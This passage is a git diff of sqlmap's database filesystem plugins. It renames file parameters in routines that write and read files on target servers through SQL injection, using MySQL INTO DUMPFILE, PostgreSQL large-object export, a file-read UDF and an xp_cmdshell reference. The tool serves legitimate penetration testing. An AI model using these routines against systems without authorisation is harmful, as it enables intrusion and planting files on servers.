logger.debug(debugMsg)
|
||||||
|
|
||||||
pushValue(kb.forceWhere)
|
pushValue(kb.forceWhere)
|
||||||
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
|
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
|
||||||
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile)
|
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
|
||||||
unionUse(sqlQuery, unpack=False)
|
unionUse(sqlQuery, unpack=False)
|
||||||
kb.forceWhere = popValue()
|
kb.forceWhere = popValue()
|
||||||
|
|
||||||
|
@ -112,12 +112,12 @@ class Filesystem(GenericFilesystem):
|
||||||
warnMsg += "file as a leftover from UNION query"
|
warnMsg += "file as a leftover from UNION query"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
logger.debug("encoding file to its hexadecimal string value")
|
logger.debug("encoding file to its hexadecimal string value")
|
||||||
|
|
||||||
fcEncodedList = self.fileEncode(wFile, "hex", True)
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
||||||
fcEncodedStr = fcEncodedList[0][2:]
|
fcEncodedStr = fcEncodedList[0][2:]
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
|
@ -128,10 +128,10 @@ class Filesystem(GenericFilesystem):
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr)
|
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
|
||||||
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
|
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
|
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
|
||||||
|
@ -140,9 +140,9 @@ class Filesystem(GenericFilesystem):
|
||||||
warnMsg += "file as a leftover from original query"
|
warnMsg += "file as a leftover from original query"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
debugMsg = "creating a support table to write the hexadecimal "
|
debugMsg = "creating a support table to write the hexadecimal "
|
||||||
debugMsg += "encoded file to"
|
debugMsg += "encoded file to"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
@ -150,7 +150,7 @@ class Filesystem(GenericFilesystem):
|
||||||
self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
|
self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
|
||||||
|
|
||||||
logger.debug("encoding file to its hexadecimal string value")
|
logger.debug("encoding file to its hexadecimal string value")
|
||||||
fcEncodedList = self.fileEncode(wFile, "hex", False)
|
fcEncodedList = self.fileEncode(localFile, "hex", False)
|
||||||
|
|
||||||
debugMsg = "forging SQL statements to write the hexadecimal "
|
debugMsg = "forging SQL statements to write the hexadecimal "
|
||||||
debugMsg += "encoded file to the support table"
|
debugMsg += "encoded file to the support table"
|
||||||
|
@ -165,10 +165,10 @@ class Filesystem(GenericFilesystem):
|
||||||
for sqlQuery in sqlQueries:
|
for sqlQuery in sqlQueries:
|
||||||
inject.goStacked(sqlQuery)
|
inject.goStacked(sqlQuery)
|
||||||
|
|
||||||
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
|
||||||
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True)
|
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)
|
||||||
|
|
||||||
return self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
|
@ -9,12 +9,12 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "File system read access not yet implemented for "
|
errMsg = "File system read access not yet implemented for "
|
||||||
errMsg += "Oracle"
|
errMsg += "Oracle"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "File system write access not yet implemented for "
|
errMsg = "File system write access not yet implemented for "
|
||||||
errMsg += "Oracle"
|
errMsg += "Oracle"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -22,22 +22,22 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
GenericFilesystem.__init__(self)
|
GenericFilesystem.__init__(self)
|
||||||
|
|
||||||
def stackedReadFile(self, rFile):
|
def stackedReadFile(self, remoteFile):
|
||||||
infoMsg = "fetching file: '%s'" % rFile
|
infoMsg = "fetching file: '%s'" % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
self.initEnv()
|
self.initEnv()
|
||||||
|
|
||||||
return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread")
|
return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
|
||||||
|
|
||||||
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "PostgreSQL does not support file upload with UNION "
|
errMsg = "PostgreSQL does not support file upload with UNION "
|
||||||
errMsg += "query SQL injection technique"
|
errMsg += "query SQL injection technique"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
wFileSize = os.path.getsize(wFile)
|
localFileSize = os.path.getsize(localFile)
|
||||||
content = open(wFile, "rb").read()
|
content = open(localFile, "rb").read()
|
||||||
|
|
||||||
self.oid = randomInt()
|
self.oid = randomInt()
|
||||||
self.page = 0
|
self.page = 0
|
||||||
|
@ -56,7 +56,7 @@ class Filesystem(GenericFilesystem):
|
||||||
inject.goStacked("SELECT lo_create(%d)" % self.oid)
|
inject.goStacked("SELECT lo_create(%d)" % self.oid)
|
||||||
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
|
inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid)
|
||||||
|
|
||||||
for offset in xrange(0, wFileSize, LOBLKSIZE):
|
for offset in xrange(0, localFileSize, LOBLKSIZE):
|
||||||
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
|
fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False)
|
||||||
sqlQueries = self.fileToSqlQueries(fcEncodedList)
|
sqlQueries = self.fileToSqlQueries(fcEncodedList)
|
||||||
|
|
||||||
|
@ -69,12 +69,12 @@ class Filesystem(GenericFilesystem):
|
||||||
self.page += 1
|
self.page += 1
|
||||||
|
|
||||||
debugMsg = "exporting the OID %s file content to " % fileType
|
debugMsg = "exporting the OID %s file content to " % fileType
|
||||||
debugMsg += "file '%s'" % dFile
|
debugMsg += "file '%s'" % remoteFile
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True)
|
inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True)
|
||||||
|
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
|
inject.goStacked("SELECT lo_unlink(%d)" % self.oid)
|
||||||
|
|
||||||
|
|
|
@ -18,7 +18,7 @@ class Enumeration(GenericEnumeration):
|
||||||
warnMsg = "on SQLite it is not possible to get name of the current database"
|
warnMsg = "on SQLite it is not possible to get name of the current database"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
def isDba(self, *args, **kwargs):
|
def isDba(self, user=None):
|
||||||
warnMsg = "on SQLite the current user has all privileges"
|
warnMsg = "on SQLite the current user has all privileges"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on SQLite it is not possible to read files"
|
errMsg = "on SQLite it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on SQLite it is not possible to write files"
|
errMsg = "on SQLite it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on Sybase it is not possible to read files"
|
errMsg = "on Sybase it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on Sybase it is not possible to write files"
|
errMsg = "on Sybase it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -203,12 +203,12 @@ class Filesystem(object):
|
||||||
errMsg += "into the specific DBMS plugin"
|
errMsg += "into the specific DBMS plugin"
|
||||||
raise SqlmapUndefinedMethod(errMsg)
|
raise SqlmapUndefinedMethod(errMsg)
|
||||||
|
|
||||||
def readFile(self, remoteFiles):
|
def readFile(self, remoteFile):
|
||||||
localFilePaths = []
|
localFilePaths = []
|
||||||
|
|
||||||
self.checkDbmsOs()
|
self.checkDbmsOs()
|
||||||
|
|
||||||
for remoteFile in remoteFiles.split(','):
|
for remoteFile in remoteFile.split(','):
|
||||||
fileContent = None
|
fileContent = None
|
||||||
kb.fileReadMode = True
|
kb.fileReadMode = True
|
||||||
|
|
||||||
|
|
|
@ -165,7 +165,7 @@ class Miscellaneous(object):
|
||||||
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
|
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL):
|
if Backend.isDbms(DBMS.MSSQL):
|
||||||
udfDict = {"master..new_xp_cmdshell": None}
|
udfDict = {"master..new_xp_cmdshell": {}}
|
||||||
|
|
||||||
if udfDict is None:
|
if udfDict is None:
|
||||||
udfDict = self.sysUdfs
|
udfDict = self.sysUdfs
|
||||||
|
|
Loading…
Reference in New Issue
Block a user